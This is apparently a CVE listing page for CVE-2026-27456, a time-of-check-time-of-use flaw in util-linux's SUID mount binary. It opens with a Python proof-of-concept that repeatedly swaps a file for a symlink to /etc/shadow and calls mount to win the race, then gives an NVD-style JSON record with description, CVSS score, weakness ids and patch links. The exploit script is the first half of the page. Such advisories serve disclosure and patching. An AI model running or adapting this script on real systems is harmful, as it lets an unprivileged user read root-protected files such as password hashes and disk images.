CVE-2026-27456

#!/usr/bin/env python3 # PoC Concept: Exploiting TOCTOU in util-linux mount # Requires: /etc/fstab entry with 'user,loop' pointing to a writable directory import os import time import subprocess TARGET = '/path/to/writable/directory/file.img' SYMLINK = '/path/to/writable/directory/link.img' MOUNT_POINT = '/tmp/mount_point' PRIVILEGED_FILE = '/etc/shadow' # Target to read # Ensure mount point exists os.makedirs(MOUNT_POINT, exist_ok=True) # Create a dummy file to pass initial checks with open(TARGET, 'wb') as f: f.write(b'DUMMY') print(f"[+] Starting race condition attack on {TARGET}...") try: while True: # Step 1: Replace file with symlink to privileged file if os.path.exists(TARGET): os.remove(TARGET) os.symlink(PRIVILEGED_FILE, SYMLINK) os.rename(SYMLINK, TARGET) # Step 2: Trigger mount (SUID binary) # In a real exploit, precise timing is critical. # This loop attempts to hit the window between check and open. proc = subprocess.Popen(['mount', TARGET, MOUNT_POINT], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) # Step 3: Quickly switch back (optional, depending on specific check logic) # to avoid errors that might stop the process before open. # time.sleep(0.001) proc.wait() # Check if we successfully mounted the target if os.path.ismount(MOUNT_POINT): print("[!] Exploit potential success! Check mount point.") # Clean up subprocess.run(['umount', MOUNT_POINT]) break except KeyboardInterrupt: print("[-] Exploit stopped.") finally: if os.path.islink(TARGET) or os.path.exists(TARGET): os.remove(TARGET)

{"cve": {"id": "CVE-2026-27456", "sourceIdentifier": "[email protected]", "published": "2026-04-03T22:16:25.400", "lastModified": "2026-04-22T16:08:55.100", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "util-linux is a random collection of Linux utilities. Prior to version 2.41.4, a TOCTOU (Time-of-Check-Time-of-Use) vulnerability has been identified in the SUID binary /usr/bin/mount from util-linux. The mount binary, when setting up loop devices, validates the source file path with user privileges via fork() + setuid() + realpath(), but subsequently re-canonicalizes and opens it with root privileges (euid=0) without verifying that the path has not been replaced between both operations. Neither O_NOFOLLOW, nor inode comparison, nor post-open fstat() are employed. This allows a local unprivileged user to replace the source file with a symlink pointing to any root-owned file or device during the race window, causing the SUID binary to open and mount it as root. Exploitation requires an /etc/fstab entry with user,loop options whose path points to a directory where the attacker has write permission, and that /usr/bin/mount has the SUID bit set (the default configuration on virtually all Linux distributions). The impact is unauthorized read access to root-protected files and block devices, including backup images, disk volumes, and any file containing a valid filesystem. This issue has been patched in version 2.41.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.0, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-59"}, {"lang": "en", "value": "CWE-269"}, {"lang": "en", "value": "CWE-367"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-367"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kernel:util-linux:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.41.4", "matchCriteriaId": "A0F464C1-2AC1-4B59-B522-89DD9D072C7F"}]}]}], "references": [{"url": "https://github.com/util-linux/util-linux/commit/5e390467b26a3cf3fecc04e1a0d482dff3162fc4", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/util-linux/util-linux/releases/tag/v2.41.4", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/util-linux/util-linux/security/advisories/GHSA-qq4x-vfq4-9h9g", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/util-linux/util-linux/security/advisories/GHSA-qq4x-vfq4-9h9g", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}